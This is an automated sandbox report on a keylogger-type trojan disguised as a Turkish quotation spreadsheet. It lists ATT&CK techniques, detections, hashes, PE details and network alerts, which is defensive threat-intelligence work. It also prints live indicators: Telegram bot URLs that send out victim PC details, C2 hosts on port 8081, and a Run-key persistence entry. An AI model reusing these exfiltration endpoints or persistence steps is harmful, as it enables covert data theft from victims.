                    Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Email Collection | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | 1 Input Capture | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    [Behavior graph: ID 1528904; Sample: TEKL#U0130F TALEP VE F#U013...; Startdate: 08/10/2024; Architecture: WINDOWS; Score: 100]

                    Source | Detection | Scanner | Label | Link
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | 42% | Virustotal | | Browse
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                    C:\Users\user\AppData\Roaming\Tojeiuai.exe | 42% | Virustotal | | Browse

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    reallyfreegeoip.org | 0% | Virustotal | | Browse
                    api.telegram.org | 2% | Virustotal | | Browse
                    checkip.dyndns.com | 0% | Virustotal | | Browse
                    checkip.dyndns.org | 0% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link
                    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
                    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
                    https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
                    http://checkip.dyndns.org | 0% | URL Reputation | safe |
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe |
                    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
                    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
                    http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe |
                    https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
                    https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
                    http://checkip.dyndns.org/q | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
                    https://github.com/mgravell/protobuf-netJ | 0% | Virustotal | | Browse
                    https://api.telegram.org | 1% | Virustotal | | Browse
                    https://api.telegram.org/bot | 4% | Virustotal | | Browse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
                    https://www.office.com/ | 0% | Virustotal | | Browse
                    https://github.com/mgravell/protobuf-net | 0% | Virustotal | | Browse
                    https://www.office.com/lB | 0% | Virustotal | | Browse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a | 2% | Virustotal | | Browse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text= | 2% | Virustotal | | Browse
                    https://chrome.google.com/webstore?hl=en | 0% | Virustotal | | Browse
                    http://anotherarmy.dns.army:8081 | 18% | Virustotal | | Browse
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 7% | Virustotal | | Browse
                    http://aborters.duckdns.org:8081 | 14% | Virustotal | | Browse
                    https://github.com/mgravell/protobuf-neti | 0% | Virustotal | | Browse
                    http://varders.kozow.com:8081 | 15% | Virustotal | | Browse
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
                    api.telegram.org | 149.154.167.220 | true | true | | unknown
                    checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
                    checkip.dyndns.org | unknown | unknown | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
                    http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528904
Start date and time: 2024-10-08 12:44:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original Sample Name: TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/2@3/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 456
                            • Number of non-executed functions: 36
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
06:44:58 | API Interceptor | 15475130x Sleep call for process: InstallUtil.exe modified
12:44:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tojeiuai C:\Users\user\AppData\Roaming\Tojeiuai.exe
12:45:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tojeiuai C:\Users\user\AppData\Roaming\Tojeiuai.exe
                                                • 193.122.6.168
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.130.0
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.247.73
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                api.telegram.orgSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 149.154.167.99
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                CLOUDFLARENETUShttps://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                • 104.17.246.203
                                                PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.93.17
                                                http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                • 104.22.51.98
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                na.elfGet hashmaliciousUnknownBrowse
                                                • 104.28.142.242
                                                Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                na.elfGet hashmaliciousUnknownBrowse
                                                • 104.16.244.186
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                ORACLE-BMC-31898USSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                PO.L0009316.Pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.6.168
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.130.0
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                Justificante de pago.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                XvAqhy3FO6.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 150.136.104.146
                                                RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9adSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                https://s.craft.me/yB5midhwwaHUPWGet hashmaliciousHTMLPhisherBrowse
                                                • 188.114.97.3
                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                No context
                                                Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2394624
                                                Entropy (8bit):7.083256086733377
                                                Encrypted:false
                                                SSDEEP:24576:wLQ4ptMQJ/FlikzQjbrf5k+OhMAYg+BFe73DXiAeBHYGnUjkuxx/d//6e:w7lCbrRkHhMRTi3DXiAJeUndH
                                                MD5:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                SHA1:9D21FE92EE433BE3BE4C09F8D242B4AD87D2158C
                                                SHA-256:E918F19D7627B7FA623F669351F2E00E029FA71BF08082C527DA5B88EC53B9DC
                                                SHA-512:D377B79A8220426EAFAFAC5A9E9FAAF8DC556DBF0AC545E485ECEE2D3BDAB6100EEE6416C104DB8F6C847D5672F2CFF92612AD989A8FCF36F147C357DB100CBB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                • Antivirus: Virustotal, Detection: 42%, Browse
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.083256086733377
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File size:2'394'624 bytes
                                                MD5:1e9dc5041bf503cb63397e6a8f0bae9a
                                                SHA1:9d21fe92ee433be3be4c09f8d242b4ad87d2158c
                                                SHA256:e918f19d7627b7fa623f669351f2e00e029fa71bf08082c527da5b88ec53b9dc
                                                SHA512:d377b79a8220426eafafac5a9e9faaf8dc556dbf0ac545e485ecee2d3bdab6100eee6416c104db8f6c847d5672f2cff92612ad989a8fcf36f147c357db100cbb
                                                SSDEEP:24576:wLQ4ptMQJ/FlikzQjbrf5k+OhMAYg+BFe73DXiAeBHYGnUjkuxx/d//6e:w7lCbrRkHhMRTi3DXiAJeUndH
                                                TLSH:12B53817BDC685F3C26907BAC5971C2853B1D9433213FA0A754A1B9A07433EABF4992F
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x649cee
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6704E1DB [Tue Oct 8 07:40:11 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x249ca00x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x640.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24c0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x247cf4 | 0x247e00 | 72d7e4fca451f8f94363832df2e85bd5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x24a000 | 0x640 | 0x800 | 7c67ce1d04d6e8f303d113f5f68c7fff | False | 0.32470703125 | data | 3.538350796189304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x24c000 | 0xc | 0x200 | ab0bbabeaf7dcefbb0e3889294c8f86a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x24a0a0 | 0x3ec | data | | | 0.3705179282868526
RT_MANIFEST | 0x24a48c | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T12:44:58.764930+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | TCP
2024-10-08T12:44:59.780550+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:00.369709+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:05.718074+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:14.405600+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:15.358712+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:15.932731+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:16.561818+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:18.218098+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:20.936823+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:22.339580+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49754 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:22.339649+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49755 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:22.833988+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:23.461464+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49769 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:23.570189+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49770 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:23.638700+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49771 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:24.077496+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49776 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:25.727929+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49785 | 188.114.97.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Oct 8, 2024 12:45:19.443785906 CEST49744443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:19.449680090 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.454766035 CEST8049753158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:19.454840899 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.454963923 CEST4975380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:19.459839106 CEST8049753158.101.44.242192.168.2.5
